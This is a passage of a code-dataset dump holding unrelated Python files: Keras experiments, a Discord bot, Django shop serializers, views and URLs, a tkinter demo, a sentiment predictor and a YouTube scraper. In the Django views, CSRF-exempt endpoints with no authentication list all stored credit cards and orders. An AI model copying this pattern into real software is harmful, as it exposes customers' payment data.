\n output_dir=f\"training_data/logs/{exp_folder}/{exp}/{name_str}\" \n )\n res, naeval, corr = uasp.evaluate_all(hsm, input_val_processed, output_val, output_val_mask)\n hsm.save_model(f\"./training_data/models/{exp_folder}/{exp}/{name}__{i}.ndnmod\")\n with open(\"./training_data/experiments.txt\", \"a+\") as f:\n f.write(f\"{exp_folder}/{exp}/{name}\\n\")\n\nif __name__ == \"__main__\":\n fire.Fire(runner)\n","sub_path":"experiments/experiments_3/bs4_exp8.py","file_name":"bs4_exp8.py","file_ext":"py","file_size_in_byte":4655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"184920668","text":"__author__ = 'Nathan'\n\nfrom flask import g\nfrom entityframework.dbtypes import Operation\nfrom codeutils.misc import camelcase_to_sentence, camelcase_to_underscore, \\\n first_type\nfrom entityframework.templates import lookup, add_directory\n\nadd_directory(__name__)\nform = lookup.get_template(\"form.html\")\n\ndef form_template(form_config, action_url, **kwargs):\n \"\"\"\n Handles basic form template field processing.\n \"\"\"\n class_ = kwargs[\"class_\"] = first_type(form_config.model)\n class_name = kwargs[\"class_name\"] = class_.__name__\n kwargs[\"title\"] = camelcase_to_sentence(class_name)\n kwargs[\"type_\"] = camelcase_to_underscore(class_name)\n if not isinstance(form_config.model, type):\n submit_type = kwargs[\"submit_type\"] = \"Update\"\n else:\n submit_type = kwargs[\"submit_type\"] = \"Create\"\n operations = kwargs[\"operations\"] = getattr(g, \"operations\", [])\n if not (\"Update\" in operations or submit_type == \"Create\"):\n form_config.disabled()\n kwargs[\"rendered_fields\"] = form_config.render()\n kwargs[\"form_name\"] = class_name + submit_type\n if submit_type == \"Create\":\n kwargs[\"render_create\"] = True\n elif submit_type == \"Update\":\n if \"Update\" in operations:\n kwargs[\"render_update\"] = True\n if \"Update\" in operations:\n kwargs[\"render_delete\"] = True\n kwargs[\"action_url\"] = action_url\n return 
form.render(**kwargs)\n","sub_path":"entityframework_form/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444162673","text":"from discord.ext import commands\nimport os\nimport keep_alive\nimport discord\n#from threading import Thread\n\n#def input_thread\n\nstart_time = time.time()\n\nkeep_alive.keep_alive()\n\nbot = commands.Bot(\n command_prefix='!',\n description='an apex tracker bot by tomate_boi#7518',\n owner_id=374886124126208000,\n case_insensitive=True\n)\n\ncogs = ['cogs.apex', 'cogs.general']\n\n@bot.event\nasync def on_ready():\n print(f'logged in as {bot.user.name}/{bot.user.id}')\n\n for cog in cogs:\n bot.load_extension(cog)\n return\n\nprint('starting bot...')\n\n\nbot.run(os.environ['SECRET'], bot=True, reconnect=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"117443883","text":"\"\"\"\nParameters\nDefine the following set of parameters :\n * grid parameters\n\"\"\"\n\nfrom numpy import array\nfrom collections import namedtuple\n\n\n# Model grid parameters\ngrid_min = array([0., 0., 0.])\ngrid_max = array([15., 15., 100.])\ngrid_resolution = array([5, 5, 25])\ngrid_nb_nodes = grid_resolution[0] * grid_resolution[1] * grid_resolution[2]\ngrid_fixed_box = array([0., 0., 0., 15., 15., 0.])\ngrid = {'min': grid_min,\n 'max': grid_max,\n 'res': grid_resolution,\n 'size': grid_min.tolist() + grid_max.tolist(),\n 'nb_nodes': grid_nb_nodes,\n 'fixed_box': grid_fixed_box}\np_grid = namedtuple('p_grid', grid)(**grid)\n","sub_path":"examples/demos/Beam/UNet/Environment/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"544786852","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\n\nfrom accounts.api.serializer import UserSerializer\nfrom client.models import Profile, Client\nfrom project.models import Project\nfrom address.serializers import AddressSerializer\nfrom address.models import Address\n\nUser = get_user_model()\n\nclass ProfileSerializer(serializers.ModelSerializer):\n\n address = AddressSerializer()\n user = UserSerializer()\n\n class Meta:\n model = Profile\n fields = ('id', 'user', 'image', 'birth_date', 'is_support', 'is_manager', 'is_admin', 'address',)\n read_only_fields = ('id',)\n\n def create(self, validated_data):\n address_data = validated_data.pop('address')\n address = Address.objects.create(**address_data)\n\n profile = Profile(**validated_data)\n profile.address = address\n profile.save()\n\n return profile\n\n\nclass ProfileDetailSerializer(serializers.ModelSerializer):\n\n address = AddressSerializer()\n user = UserSerializer()\n\n class Meta:\n model = Profile\n fields = ('id', 'user', 'image', 'birth_date', 'address')\n read_only_fields = ('id',)\n\n def update(self, instance, validated_data):\n address = instance.address\n address_data = validated_data.get('address')\n address.street = address_data.get('street', address.street)\n address.complement = address_data.get('complement', address.complement)\n address.post_code = address_data.get('post_code', address.post_code)\n address.city = address_data.get('city', address.city)\n address.state = address_data.get('state', address.state)\n 
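# each field falls back to its current value when absent from the request payload\n        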
address.country = address_data.get('country', address.country)\n address.save()\n\n instance.image = validated_data.get('image', instance.image)\n instance.birth_date = validated_data.get('birth_date', instance.birth_date)\n instance.address = address\n instance.save()\n\n return instance\n\n\nclass ClientSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Client\n fields = ('id', 'user', 'company')\n read_only_fields = ('id',)\n\n def create(self, validated_data):\n client = Client.objects.create(**validated_data)\n return client\n\n\nclass ClientListSerializer(serializers.ModelSerializer):\n\n user = UserSerializer()\n\n class Meta:\n model = Client\n fields = ('id', 'user', 'company', 'products')\n read_only_fields = ('id','info',)\n\nclass ClientDetailSerializer(serializers.ModelSerializer):\n\n supported_projects = serializers.PrimaryKeyRelatedField(many=True, queryset=Project.objects.all())\n user = UserSerializer()\n\n class Meta:\n model = Client\n\n fields = ('id', 'company', 'supported_projects', 'user')\n\n def update(self, instance, validated_data):\n user = User.objects.get(pk=validated_data.get('user'))\n instance.user = user\n instance.email = user.email\n instance.company = validated_data.get('company')\n instance.save()\n return instance\n\n","sub_path":"product/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"115779648","text":"from keras.datasets import imdb\nfrom keras import models, regularizers\nfrom keras import layers\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Take only the top 10000 most frequently occurring words.\n(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)\n\n\ndef explore():\n print(train_data.shape)\n print(train_labels.shape)\n\n print(test_data.shape)\n print(test_labels.shape)\n\n print(train_data[0])\n print(train_labels[0])\n\n print(max(max(sequence) for sequence in train_data))\n\n # word_index is a dictionary mapping: word -> int indices\n word_index = imdb.get_word_index()\n # reversing it, mapping becomes int indices -> word\n reversed_word_index = dict([(value, key) for (key, value) in word_index.items()])\n decoded_review = ' '.join(reversed_word_index.get(i-3, '?') for i in train_data[0])\n print(decoded_review)\n\n\nexplore()\n\n\"\"\"Encoding the integer sequence into a binary matrix\"\"\"\n\n\ndef vectorise_sequences(sequences, dimension=10000):\n results = np.zeros((len(sequences), dimension))\n # print(results)\n # print(sequences)\n # print(enumerate(sequences))\n for i, sequence in enumerate(sequences):\n # print(i, sequence)\n results[i, sequence] = 1.\n return results\n\n\n# Vectorise features\nx_train = vectorise_sequences(train_data)\nx_test = vectorise_sequences(test_data)\nprint(x_train[0])\nprint(x_train[0].shape)\n\n\n# Vectorise labels\ny_train = np.asarray(train_labels).astype('float32')\ny_test = np.asarray(test_labels).astype('float32')\n\nprint(y_train[0])\nprint(y_train[0].shape)\n\n\"\"\" The input data are vectors and the labels are scalars (1s and 0s). 
The network\n we choose is a simple stack of Dense layers with `relu` activation\n ====================\n NETWORK ARCHITECTURE\n ====================\n - Two intermediate layers with 16 hidden units each (activation = 'relu')\n To zero out the negative values\n - A third layer that will be the output the scalar prediction(sentiment of the current review)\n (activation = 'sigmoid') To output the score between 0 and 1 (how likely is the review positive)\n\"\"\"\n\n\ndef get_original_model():\n model = models.Sequential()\n model.add(layers.Dense(16, activation='relu', input_shape=(10000,)))\n model.add(layers.Dense(16, activation='relu'))\n model.add(layers.Dense(1, activation='sigmoid'))\n return model\n\n\ndef get_regularized_model():\n model = models.Sequential()\n # l2(0.001) means every coefficient in the weight matrix of\n # the layer will add 0.001 * weight_coefficient_value to the\n # total loss of the network\n model.add(layers.Dense(16, kernel_regularizer=regularizers.l2(0.001), activation='relu', input_shape=(10000,)))\n model.add(layers.Dense(16, kernel_regularizer=regularizers.l2(0.001), activation='relu', input_shape=(10000,)))\n model.add(layers.Dense(1, activation='sigmoid'))\n return model\n\n\ndef get_l1l2regularized_model():\n model = models.Sequential()\n model.add(layers.Dense(16, kernel_regularizer=regularizers.l1_l2(0.001, 0.001), activation='relu', input_shape=(10000,)))\n model.add(layers.Dense(16, kernel_regularizer=regularizers.l1_l2(0.001, 0.001), activation='relu', input_shape=(10000,)))\n model.add(layers.Dense(1, activation='sigmoid'))\n return model\n\n\n# Model and Layers Definition\n\nx_val = x_train[:10000]\npartial_x_train = x_train[10000:]\n\ny_val = y_train[:10000]\npartial_y_train = y_train[10000:]\n\n\ndef get_losses(model):\n model.compile(optimizer='rmsprop',\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n history = model.fit(partial_x_train,\n partial_y_train,\n epochs=20,\n batch_size=512,\n validation_data=(x_val, y_val))\n\n return history.history['loss'], history.history['val_loss'], history.history['acc'], history.history['val_acc']\n\n\noriginal_loss, original_val_loss, original_acc, original_val_acc = get_losses(get_original_model())\nregularized_loss, regularized_val_loss, regularized_acc, regularized_val_acc = get_losses(get_regularized_model())\nl1l2regularized_loss, l1l2regularized_val_loss, l1l2regularized_acc, l1l2regularized_val_acc = get_losses(get_l1l2regularized_model())\n\n\nepochs = range(1, len(original_loss) + 1)\n\nplt.plot(epochs, original_loss, 'bo', label='Original model')\nplt.plot(epochs, regularized_loss, 'b', label='L2Regularized model')\nplt.plot(epochs, l1l2regularized_loss, 'r', label='L1L2Regularized model')\nplt.xlabel('Epochs')\nplt.ylabel('Training Loss')\nplt.legend()\nplt.show()\n\n\nplt.plot(epochs, original_val_loss, 'bo', label='Original model')\nplt.plot(epochs, regularized_val_loss, 'b', label='L2Regularized model')\nplt.plot(epochs, l1l2regularized_val_loss, 'r', label='L1L2Regularized model')\nplt.xlabel('Epochs')\nplt.ylabel('Validation Loss')\nplt.legend()\nplt.show()\n\nplt.plot(epochs, original_acc, 'bo', label='Original model')\nplt.plot(epochs, regularized_acc, 'b', label='L2Regularized model')\nplt.plot(epochs, l1l2regularized_acc, 'r', label='L1L2Regularized model')\nplt.xlabel('Epochs')\nplt.ylabel('Training Accuracy')\nplt.legend()\nplt.show()\n\n\nplt.plot(epochs, original_val_acc, 'bo', label='Original model')\nplt.plot(epochs, regularized_val_acc, 'b', label='L2Regularized 
model')\nplt.plot(epochs, l1l2regularized_val_acc, 'r', label='L1L2Regularized model')\nplt.xlabel('Epochs')\nplt.ylabel('Validation Accuracy')\nplt.legend()\nplt.show()\n","sub_path":"chapter4/weight_regularization.py","file_name":"weight_regularization.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"147543529","text":"import logging\nfrom django.http import Http404, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import viewsets, status\nfrom rest_framework.decorators import action\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom main.models import Category, Item, CreditCard, ShoppingCart, Order\nfrom main.serializers import CategorySerializer, ItemSerializer, CreditCardSerializer, ShoppingCartSerializer, \\\n OrderSerializer\nfrom django.shortcuts import get_object_or_404, get_list_or_404\n\nlogger = logging.getLogger(__name__)\n\n\nclass CategoryViewSet(viewsets.ViewSet):\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n queryset = Category.objects.all()\n serializer = CategorySerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Category.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = CategorySerializer(user)\n return Response(serializer.data)\n\n @action(methods=['POST'], detail=False, permission_classes=(IsAdminUser, ))\n def create(self, request):\n category_data = request.data\n new_category = Category.objects.create(category_name=category_data['category_name'])\n new_category.save()\n serializer = CategorySerializer(new_category)\n logger.debug(f'Category object created, ID: {serializer.instance}')\n logger.info(f'Category object created, ID: {serializer.instance}')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Category.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Category object deleted, ID: {instance}')\n logger.info(f'Category object deleted, ID: {instance}')\n except Http404:\n logger.error(f'Category object cannot be deleted')\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(methods=['PUT'], detail=False, permission_classes=(IsAdminUser, ))\n def update(self, request, pk):\n category = Category.objects.get(id=pk)\n category.category_name = request.data['category_name']\n category.save()\n serializer = CategorySerializer(category)\n logger.debug(f'Category object updated, ID: {serializer.instance}')\n logger.info(f'Category object updated, ID: {serializer.instance}')\n return Response(serializer.data)\n\n\nclass ItemViewSet(viewsets.ViewSet):\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n queryset = Item.objects.all()\n serializer = ItemSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Item.objects.filter(category=pk)\n user = get_list_or_404(queryset)\n serializer = ItemSerializer(user, many=True)\n return Response(serializer.data)\n\n @action(methods=['POST'], detail=False, permission_classes=(IsAdminUser,))\n def create(self, request):\n item_data = request.data\n category = Category.objects.get(id=item_data['category'])\n new_item = Item.objects.create(item_name=item_data['item_name'], 
price=item_data['price'],\n description=item_data['description'], category=category)\n new_item.save()\n serializer = ItemSerializer(new_item)\n logger.debug(f'Item object created, ID: {serializer.instance}')\n logger.info(f'Item object created, ID: {serializer.instance}')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Item.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Item object deleted, ID: {instance}')\n logger.info(f'Item object deleted, ID: {instance}')\n except Http404:\n logger.error(f'Item object cannot be deleted')\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def select(self, request, pk=None):\n queryset = Item.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = ItemSerializer(user)\n return Response(serializer.data)\n\n @action(methods=['PUT'], detail=False, permission_classes=(IsAdminUser, ))\n def update(self, request, pk):\n _item = Item.objects.get(id=pk)\n _item.item_name = request.data['item_name']\n _item.price = request.data['price']\n _item.description = request.data['description']\n category = Category.objects.get(category_name=request.data['category'])\n _item.category = category\n _item.save()\n serializer = ItemSerializer(_item)\n logger.debug(f'Item object updated, ID: {serializer.instance}')\n logger.info(f'Item object updated, ID: {serializer.instance}')\n return Response(serializer.data)\n\n\n@csrf_exempt\ndef credit_card(request):\n if request.method == 'GET':\n credit_cards = CreditCard.objects.all()\n serializer = CreditCardSerializer(credit_cards, many=True)\n return JsonResponse(serializer.data, safe=False)\n elif request.method == 'POST':\n json_data = JSONParser().parse(request)\n serializer = CreditCardSerializer(data=json_data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'CreditCard object created, ID: {serializer.instance}')\n logger.info(f'CreditCard object created, ID: {serializer.instance}')\n return JsonResponse(serializer.data, safe=False)\n else:\n logger.error(f'CreditCard object is not created, ID: {serializer.errors}')\n return JsonResponse(serializer.errors, safe=False)\n\n\nclass CreditCardAPIView(APIView):\n permission_classes = (IsAuthenticated, )\n\n def get_object(self, pk):\n try:\n return CreditCard.objects.get(pk=pk)\n except CreditCard.DoesNotExist:\n raise Http404\n\n def put(self, request, pk, format=None):\n card = self.get_object(pk)\n serializer = CreditCardSerializer(card, data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'CreditCard object updated, ID: {serializer.instance}')\n logger.info(f'CreditCard object updated, ID: {serializer.instance}')\n return Response(serializer.data)\n logger.error(f'CreditCard object cannot be updated, {serializer.errors}')\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n card = self.get_object(pk)\n card.delete()\n logger.debug(f'CreditCard object deleted')\n logger.info(f'CreditCard object deleted')\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass ShoppingCartAPIView(APIView):\n permission_classes = (IsAuthenticated, )\n\n def get_object(self, pk):\n try:\n return ShoppingCart.objects.get(customer_id=pk)\n except ShoppingCart.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n shopping_cart = self.get_object(pk)\n serializer = ShoppingCartSerializer(shopping_cart)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n 
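# replace the cart contents; invalid payloads return HTTP 400 with the serializer errors\n        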
shopping_cart = self.get_object(pk)\n serializer = ShoppingCartSerializer(shopping_cart, data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'ShoppingCart object updated, ID: {serializer.instance}')\n logger.info(f'ShoppingCart object updated, ID: {serializer.instance}')\n return Response(serializer.data)\n logger.error(f'ShoppingCart object cannot be updated')\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n shopping_cart = self.get_object(pk)\n shopping_cart.delete()\n logger.debug(f'ShoppingCart object deleted')\n logger.info(f'ShoppingCart object deleted')\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@csrf_exempt\ndef shopping_cart(request):\n if request.method == 'POST':\n json_data = JSONParser().parse(request)\n serializer = ShoppingCartSerializer(data=json_data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'ShoppingCart object created, ID: {serializer.instance}')\n logger.info(f'ShoppingCart object created, ID: {serializer.instance}')\n return JsonResponse(serializer.data, safe=False)\n else:\n logger.error(f'ShoppingCart object cannot be created, {serializer.errors}')\n return JsonResponse(serializer.errors, safe=False)\n\n\nclass OrderAPIView(APIView):\n permission_classes = (IsAuthenticated, )\n\n def get_object(self, pk):\n try:\n return Order.objects.get(pk=pk)\n except Order.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n order = self.get_object(pk)\n serializer = OrderSerializer(order)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n order= self.get_object(pk)\n serializer = OrderSerializer(order, data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'Order object updated, ID: {serializer.instance}')\n logger.info(f'Order object updated, ID: {serializer.instance}')\n return Response(serializer.data)\n logger.error(f'Order object cannot be updated, {serializer.errors}')\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n order = self.get_object(pk)\n order.delete()\n logger.debug(f'Order object deleted')\n logger.info(f'Order object deleted')\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@csrf_exempt\ndef orders(request):\n if request.method == 'GET':\n all_orders = Order.objects.all()\n serializer = OrderSerializer(all_orders, many=True)\n return JsonResponse(serializer.data, safe=False)\n elif request.method == 'POST':\n json_data = JSONParser().parse(request)\n serializer = OrderSerializer(data=json_data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'Order object created, ID: {serializer.instance}')\n logger.info(f'Order object created, ID: {serializer.instance}')\n return JsonResponse(serializer.data, safe=False)\n else:\n logger.error(f'Order object cannot be created, {serializer.errors}')\n return JsonResponse(serializer.errors, safe=False)\n\n\n# def cart_add_item(request, pk):\n# cart = ShoppingCart(request)\n# item = Item.objects.get(id=pk)\n# cart.cart_items.add(item)\n# return redirect(\"items/\")\n","sub_path":"endterm/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"323666928","text":"from django.db import models\nfrom datetime import datetime\nfrom datetime import datetime, timedelta\nimport 
django.db.models.options as options\nimport json\noptions.DEFAULT_NAMES = options.DEFAULT_NAMES + ('fields_searchable',)\n\n# Create your models here.\n\nclass Auditprocess(models.Model):\n\n PROCESS_INCREMENTAL=\"Incremental\"\n PROCESS_ONLY_BACKLOG=\"Only Backlog\"\n PROCESS_ANALYSIS_BACKLOG=\"Analysis Backlog\"\n\n process = models.CharField(max_length=255, blank=True, null=True)\n status = models.CharField(max_length=255, blank=True, null=True)\n start_date = models.DateTimeField(auto_now_add=False, null=True, editable=False)\n end_date = models.DateTimeField(auto_now_add=False, null=True, editable=False)\n timestamp_date = models.DateTimeField(auto_now_add=True, editable=False)\n initial_records = models.IntegerField(blank=True, null=True)\n final_records = models.IntegerField(blank=True, null=True)\n pid = models.CharField(max_length=10, blank=True, null=True)\n msg = models.TextField(blank=True, null=True)\n\n def setInitial(self, data):\n\n self.process=data[\"process\"] \n self.status=\"Initial\"\n if (\"pid\" in data):\n self.pid=data[\"pid\"]\n self.timestamp_date=datetime.now()\n self.start_date=datetime.now()\n if (\"msg\" in data):\n self.msg=data[\"msg\"]\n self.save()\n\n def setInProgress(self, data):\n\n self.status=\"In progress\"\n self.timestamp_date=datetime.now()\n if \"initial_records\" in data:\n self.initial_records=data[\"initial_records\"]\n if (\"msg\" in data):\n self.msg=data[\"msg\"]\n self.save()\n \n def setFinished(self, data):\n\n self.status=\"Finished\"\n self.timestamp_date=datetime.now()\n if \"final_records\" in data:\n self.final_records=data[\"final_records\"]\n self.end_date=datetime.now()\n if (\"msg\" in data):\n self.msg=data[\"msg\"]\n self.save()\n \n def setCancelled(self, data):\n\n self.status=\"Cancelled\"\n self.timestamp_date=datetime.now()\n if \"final_records\" in data:\n self.final_records=data[\"final_records\"]\n self.end_date=datetime.now()\n if (\"msg\" in data):\n self.msg=data[\"msg\"]\n self.save()\n\n def setError(self, data):\n\n self.status=\"Error\"\n self.timestamp_date=datetime.now()\n self.end_date=datetime.now()\n if (\"msg\" in data):\n self.msg=data[\"msg\"]\n self.save()\n\n class Meta:\n ordering = ('id',)\n fields_searchable = '__all__'\n\n","sub_path":"auditprocess/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"146574352","text":"# coding: utf-8\n#########################################################################\n# 网站: 疯狂Java联盟 #\n# author yeeku.H.lee kongyeeku@163.com #\n# #\n# version 1.0 #\n# #\n# Copyright (C), 2001-2018, yeeku.H.Lee #\n# #\n# This program is protected by copyright laws. #\n# #\n# Program Name: #\n# #\n#
Date: #\n#########################################################################\nfrom tkinter import *\n# 导入ttk\nfrom tkinter import ttk\nclass App:\n def __init__(self, master):\n self.master = master\n self.initWidgets()\n def initWidgets(self):\n # 创建一个Label组件\n ttk.Label(self.master, text='选择您喜欢的兵种:')\\\n .pack(fill=BOTH, expand=YES)\n self.intVar = IntVar()\n # 定义元组\n races = ('z.png', 'p.pNg','t.png')\n raceNames = ('虫族', '神族','人族')\n i = 1\n # 采用循环创建多个Radiobutton\n for rc in races:\n bm = PhotoImage(file = 'images/' + rc)\n r = ttk.Radiobutton(self.master, \n image = bm,\n text = raceNames[i - 1],\n compound = RIGHT, # 图片在文字右边\n variable = self.intVar, # 将Radiobutton绑定到self.intVar变量\n command = self.change, # 将选中事件绑定到self.change方法\n value=i)\n r.bm = bm\n r.pack(anchor=W)\n i += 1\n # 设置默认选中value为2的单选按钮\n self.intVar.set(2)\n def change(self): pass\nroot = Tk()\nroot.title(\"Radiobutton测试\")\n# 改变窗口图标\nroot.iconbitmap('images/fklogo.ico')\nApp(root)\nroot.mainloop()\n","sub_path":"官方配套代码/11/11.5/Radiobutton_test2.py","file_name":"Radiobutton_test2.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"324725005","text":"import numpy as np\nimport pickle\nimport re\nimport nltk\nfrom sklearn.ensemble import RandomForestClassifier\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\n\n\ndef predict():\n pkl_filename = \"pickle_model.pkl\"\n model, vectorize=pickle.load(open(pkl_filename, 'rb')) \n comment_file = pd.read_csv(\"./comments.csv\")\n flags,comments_id,comments = list(comment_file[\"flag\"]),list(comment_file[\"comments_id\"]),list(comment_file[\"comments\"]) \n processed_comments = []\n # Almost copy-pasted part from line 15 to 28. 
Removing emojis and other useless information\n for sentence in range(0, len(comments)):\n if(flags[sentence]):\n # Remove all the special characters\n being_processed = re.sub(r'\\W', ' ', str(comments[sentence]))\n # remove all single characters\n being_processed= re.sub(r'\\s+[a-zA-Z]\\s+', ' ', being_processed)\n # Remove single characters from the start\n being_processed = re.sub(r'\\^[a-zA-Z]\\s+', ' ', being_processed) \n # Substituting multiple spaces with single space\n being_processed = re.sub(r'\\s+', ' ', being_processed, flags=re.I)\n # Removing prefixed 'b'\n being_processed = re.sub(r'^b\\s+', '', being_processed)\n # Converting to Lowercase\n being_processed = being_processed.lower()\n processed_comments.append(being_processed)\n else:\n processed_comments.append(\"empty\")\n X_predict = vectorize.transform(processed_comments).toarray()\n Y_predict=model.predict(X_predict)\n # I want this Y_predict to return a list of 0,4\n # 0 -> \n # 4 -> \n return Y_predict","sub_path":"Prediction.py","file_name":"Prediction.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"315546935","text":"from django.urls import path\nfrom webapp.views import OrderListView, OrderCreateView, OrderfoodCreateView, OrderUpdateView,\\\n FoodCreateView, FoodDeleteView, FoodUpdateView, FoodListView, \\\n OrderfoodDeleteView, CourierListView, change_status, change_status_courier_1,\\\n change_status_courier_2, change_status_courier_3, DetailListView, \\\n OrderFoodAjaxCreateView, OrderFoodAjaxUpdateView, OrderFoodAjaxDeleteView\napp_name = 'webapp'\n\nurlpatterns = [\n path('', OrderListView.as_view(), name='order_list'),\n path('menu', FoodListView.as_view(), name='food_list'),\n path('food/create', FoodCreateView.as_view(), name='food_add'),\n path('food//update', FoodUpdateView.as_view(), name='food_update'),\n path('food//delete', FoodDeleteView.as_view(), name='food_delete'),\n path('order_food//delete_food', OrderfoodDeleteView.as_view(), name='order_food_delete'),\n path('order/create', OrderCreateView.as_view(), name='order_add'),\n path('order//order_food', OrderfoodCreateView.as_view(), name='order_food_add'),\n path('courier', CourierListView.as_view(), name='courier_list'),\n path('order//update', OrderUpdateView.as_view(), name='order_update'),\n path('order//change_status', change_status, name='change_status'),\n path('order//change_status_courier_1', change_status_courier_1, name='change_status_courier_1'),\n path('order//change_status_courier_2', change_status_courier_2, name='change_status_courier_2'),\n path('order//change_status_courier_3', change_status_courier_3, name='change_status_courier_3'),\n path('order_food//update', DetailListView.as_view(), name='order_detail'),\n # ----------------------------------------------------------------------------------------------------------------\n path('order//food/create', OrderFoodAjaxCreateView.as_view(), name='order_food_create'),\n path('order/food//update', OrderFoodAjaxUpdateView.as_view(), name='order_food_update'),\n path('order//food/delete', OrderFoodAjaxDeleteView.as_view(), name='order_food_delete_ajax'),\n]\n\n","sub_path":"source/webapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444472107","text":"import unittest\nimport requests\nimport downloadFunction\nfrom bs4 import BeautifulSoup\n\n#Query youtube 
with search input and return result as HTML String\ndef queryYoutube(input):\n prefix = \"https://www.youtube.com/results?search_query=\"\n postfix = \"&sp=EgIYAQ%253D%253D\"\n fixedInput = fixInput(input)\n url = prefix + fixedInput + postfix\n page = requests.get(url)\n return page.content\n\ndef isWatchLink(link):\n return link.startswith(\"/watch?v=\")\n\n#Given an HTML Youtube Result page, return all results parsed into a String Array\ndef parseDownloadLinkFromYT(page):\n soup = BeautifulSoup(page, 'html.parser')\n aset = set()\n for link in soup.find_all('a'):\n linkhref = link.get('href')\n if isWatchLink(linkhref):\n prefix = \"https://www.youtube.com\"\n youtubeLink = prefix + linkhref\n aset.add(youtubeLink)\n for link in aset:\n print(link)\n return aset\n\n\ndef printResult(result):\n if result == True:\n print(\"Files has been downloaded successfully\")\n else:\n print(\"Files has failed\")\n\ndef fixInput(input):\n output = input.replace(' ', '+')\n return output\n\n# Here's our \"unit tests\".\nclass functionTests(unittest.TestCase):\n\n def testQueryYoutube(self):\n input= \"Stuff\"\n actural = queryYoutube(input)\n self.assertTrue(len(actural) > 500)\n\n def testParseDownloadLink(self):\n page = queryYoutube(\"stuff\")\n result = parseDownloadLinkFromYT(page)\n self.assertIsNotNone(result)\n self.assertTrue(len(result) > 9)\n\n def testIsWatchLink(self):\n success = \"/watch?v=7RDSLzHJ74I\"\n self.assertTrue(isWatchLink(success))\n failure = \"ABCDE\"\n self.assertFalse(isWatchLink(failure))\n\n def testDownload(self):\n link = \"https://www.youtube.com/watch?v=FZvtATBfSpM\"\n self.assertTrue(downloadFunction.download(link))\n\n def testDownloadList(self):\n aset = set()\n aset.add(\"https://www.youtube.com/watch?v=uw7R_RGAd9I\")\n aset.add(\"https://www.youtube.com/watch?v=q-H62GgHjeg\")\n aset.add(\"https://www.youtube.com/watch?v=V7vjxhqMPng\")\n self.assertTrue(downloadFunction.downloadList(aset))\n\n def testFixInput(self):\n name = \"Cosmic Gate\"\n result = \"Cosmic+Gate\"\n actural = fixInput(name)\n self.assertEqual(actural, result)\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n 